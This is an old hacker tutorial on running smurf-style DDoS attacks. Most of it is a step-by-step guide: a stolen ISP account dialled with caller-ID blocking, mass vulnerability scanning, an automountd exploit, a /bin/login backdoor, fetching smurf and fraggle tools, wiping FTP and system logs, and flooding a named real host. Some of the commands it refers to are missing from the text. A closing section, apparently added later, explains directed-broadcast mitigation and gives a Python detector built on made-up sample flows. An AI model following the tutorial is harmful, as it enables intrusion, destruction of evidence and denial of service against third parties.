Old School DDoS Attacks - How Large Servers Got Pwned
/*
How Large Servers are Owned via DDoS
written by perator
*/
Every time you dial up to your ISP, your box is assigned an IP address. An IP address is a number (e.g. 199.44.2.1) that identifies you on the internet. Every online computer has its own unless it's on a LAN (Local Area Network), in which case it might share an IP address with several computers linked to a HUB (a network device that links computers together to form a network).
By sending "fragmented" packets to someone's IP address, you can knock them offline, freeze, "blue screen" or even reboot someone's computer, depending on the packet header and the remote computer's TCP/IP stack's buffer. This is called a DoS attack (Denial of Service attack). We are not going to do this, as little buffer overflows like those only work on Windows based operating systems. Since we're usually dealing with Sun SPARC servers, routers, nodes, and Unix based systems, we're going to use utilities which turn 200gbps of bandwidth into 0kbps. Most successful DoS exploits are run from Unix based systems, such as FreeBSD, OpenBSD, SunOS, System V, or Linux (I would recommend Slackware). Now this paper is going to start to get technical.
Your first step is to obtain root access on several UNIX based systems. Root is the superuser on a UNIX system, which has access to all socket layers, so you can send IGMP data packets and very large ICMP data packets. To obtain several roots, you must first get a normal user shell to scan from. Let's assume you run a UNIX based system. You need to get a stolen ISP account and dial into it using *67. To do this, do 'vi /etc/chatscripts/your-provider', then where it says "ATDT555-5555" edit that to "ATDT*67555-5555".
Next, go to www.vetesgirl.com and download VeteScan. Decompress it:
[user@localhost]$ tar zxvf Vete*
Then compile it.
[user@localhost]$ ./configure ; make vete
You may have to download the libpcap libraries or networking programs such as netcat. Next, choose a class A IP range, such as 210. Now you do:
[user@localhost]$ ./massa 210 > 210 > /dev/null &
Then you come back in about 20 days and you should have a list of every online computer in the 210 class and the vulnerabilities detected by your vulnerability scanner. If you do not have that kind of time, you can do this:
and wait a few minutes, but that will only scan around 200 systems, rather than 200,000. Now that you have this list, we’ll pick… the automountd exploit to use. Automountd is included with vetescan.
to see what it's called, it could vary. The daemon is usually named /usr/sbin/portmap in your process list. This is so no one comes in behind you getting your bcast lists and code. Your next step is to backdoor this box. There are numerous ways to backdoor Unix; I'll list one of the easiest ways, /bin/login.
Download bj.c from ftp.technotronic.com, or maybe I'll have doomcloud put it on his site.
Go back to your 210.109.222 list and do the same thing to about 10 other boxes, but once you're in, run /sbin/ifconfig to see how many interfaces there are, /sbin/route to view its kernel routing table, and cat /proc/cpuinfo to make sure the processor is capable of handling mass packet flow. Hopefully, you will have hit a few OC3s, OC12s, or OC48s, which are pretty fast connections. The faster the root, the better.
You could even install a sniffer to own the rest of the boxes/routers on that network. Now do 'lynx mixter.void.ru' or 'lynx hack.co.za' to download papasmurf.c, smurf.c, synk5.c, fraggle.c, a bcast scanner, and a log cleaner. Exit lynx, and compress all these files into a tar. Name it owned.tar.gz. Then ftp the tar into all 10 of your roots. Be sure to rm -rf /var/log/xferlog ; touch /var/log/xferlog when you're done transferring, to wipe the FTP logs. If you're as paranoid as I am, you'll even download a log cleaner that will automatically wipe /var/log/wtmp, /var/log/utmp, /var/log/messages, /var/log/secure, /var/log/syslog, and any other OS specific log locations.
Now that you have several OC3+ roots and the necessary Distributed Denial of Service tools (smurf, papasmurf, fraggle), you need to compile a HUGE list of broadcast IP addresses to relay packets from. This is what will kill your target. Grab a broadcast scanner from mixter.void.ru if you don't already have one.
Note: You cannot just take down ebay.com by itself, because its NS records do not say "NS IN A 10.1.50.33", which means ebay.com does not have an IP address.
However, we can take down www.ebay.com, or pages.ebay.com, which are aliased to the same IP, 216.32.120.133, because the zone records say "www IN CNAME pages.ebay.com" and "pages IN A 216.32.120.133". So that's the IP that we're going to hit.
Now to the packeting. We're going to use 7 virtual terminals in Unix (console), or open up a GUI (graphical user interface) and open several eterms/vterms/xterms, and telnet to a different OC3 on each terminal. Then get your papasmurf commands ready.
(papa)smurf.c v5.0 by TFreak
usage: ./papasmurf [options]
Options
-p: Comma separated list of dest ports (default 7)
-r: Use random dest ports
-R: Use random src/dest ports
-s: Source port (0 for random (default))
-P: Protocols to use. Either icmp, udp or both
-S: Packet size in bytes (default 64)
-f: Filename containg packet data (not needed)
-n: Num of packets to send (0 is continuous (default))
-d: Delay inbetween packets (in ms) (default 10000)
Then you get on your virtual terminals and hit all at once using different bcast lists.
Execute that command 15 times from each root, using a different bcast list for each specific root. Be sure that the IP address you're hitting actually resolves to your destination host (nslookup ip ; dig @ip chaos). Given enough bandwidth and a few KILLER bcast lists, you can take down all of Sprint, AT&T, Worldnet, GTE, etc. If you hit large providers such as Sprint, Exodus, NetSol, and UUNET, you've basically taken down most of the internet. But you can only keep it down for about 15 seconds, until your roots flood themselves out and your broadcast list's routers shoot themselves.
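The attack described above (smurf and its papasmurf/fraggle variants) depends entirely on networks that forward ICMP echo requests to their subnet broadcast address, so that every host on the subnet answers the spoofed request and the replies land on the victim. The defender's view of this has two sides: at the amplifier network's edge, echo requests addressed to a directed broadcast should never arrive from outside (this is what RFC 2644 and the Cisco "no ip directed-broadcast" default fixed), and at the victim, the flood shows up as many distinct hosts in the same /24 all sending echo replies to one target. The following detector is an added example and not code from the original article or from any of the tools it names; the flow records, the RFC 5737 documentation addresses in them, the /24 prefix assumption and the 10-source threshold are all constructed here for illustration.

```python
import ipaddress
from collections import defaultdict

# Constructed sample flow records: (src_ip, dst_ip, proto, icmp_type).
# icmp_type 8 is an echo request, 0 is an echo reply; None for non-ICMP.
# 203.0.113.5 plays the victim, 192.0.2.0/24 an abused amplifier network.
SAMPLE_FLOWS = (
    # one spoofed echo request arriving at the 192.0.2.0/24 edge, addressed
    # to that subnet's broadcast address (the hallmark of smurf on the
    # amplifier side)
    [("198.51.100.9", "192.0.2.255", "icmp", 8)]
    # twelve hosts on the amplifier network answering the victim at once
    + [(f"192.0.2.{i}", "203.0.113.5", "icmp", 0) for i in range(1, 13)]
    # three replies from another /24: ordinary ping traffic, below threshold
    + [(f"198.51.100.{i}", "203.0.113.5", "icmp", 0) for i in range(1, 4)]
    # unrelated TCP flow, ignored by both checks
    + [("10.0.0.2", "203.0.113.5", "tcp", None)]
)


def is_directed_broadcast(dst, prefix_len=24):
    """True if dst is the broadcast (or legacy all-zeros) address of its
    subnet. The subnet size is an assumption; real deployments would take
    it from the interface configuration."""
    net = ipaddress.ip_network(f"{dst}/{prefix_len}", strict=False)
    addr = ipaddress.ip_address(dst)
    return addr in (net.broadcast_address, net.network_address)


def find_amplifier_abuse(flows, prefix_len=24):
    """Amplifier-side check: echo requests addressed to a subnet broadcast.
    Returns the (src, dst) pairs that a border router honouring
    'no ip directed-broadcast' would simply have dropped."""
    return [
        (src, dst)
        for src, dst, proto, itype in flows
        if proto == "icmp" and itype == 8 and is_directed_broadcast(dst, prefix_len)
    ]


def find_reply_floods(flows, min_distinct_sources=10, prefix_len=24):
    """Victim-side check: group echo replies by (target, source /24) and
    report groups where at least min_distinct_sources different hosts of
    one subnet replied to the same target. Legitimate pings never produce a
    whole subnet answering one address."""
    replies = defaultdict(set)  # (target, source_net) -> distinct source hosts
    for src, dst, proto, itype in flows:
        if proto == "icmp" and itype == 0:
            net = ipaddress.ip_network(f"{src}/{prefix_len}", strict=False)
            replies[(dst, str(net))].add(src)
    return {key: len(hosts) for key, hosts in replies.items()
            if len(hosts) >= min_distinct_sources}


if __name__ == "__main__":
    for src, dst in find_amplifier_abuse(SAMPLE_FLOWS):
        print(f"directed-broadcast echo request {src} -> {dst}")
    for (target, net), count in find_reply_floods(SAMPLE_FLOWS).items():
        print(f"{count} hosts in {net} replying to {target}: probable smurf amplification")
```

Run against the constructed flows it reports the single echo request aimed at 192.0.2.255 and the 12-host reply group aimed at 203.0.113.5, while the three replies from 198.51.100.0/24 stay below the threshold. The amplifier-side check is the one worth acting on: a network that drops inbound directed-broadcast traffic at its border cannot be used as a relay at all, which is why the broadcast lists the article relies on shrank to nothing once that became the router default.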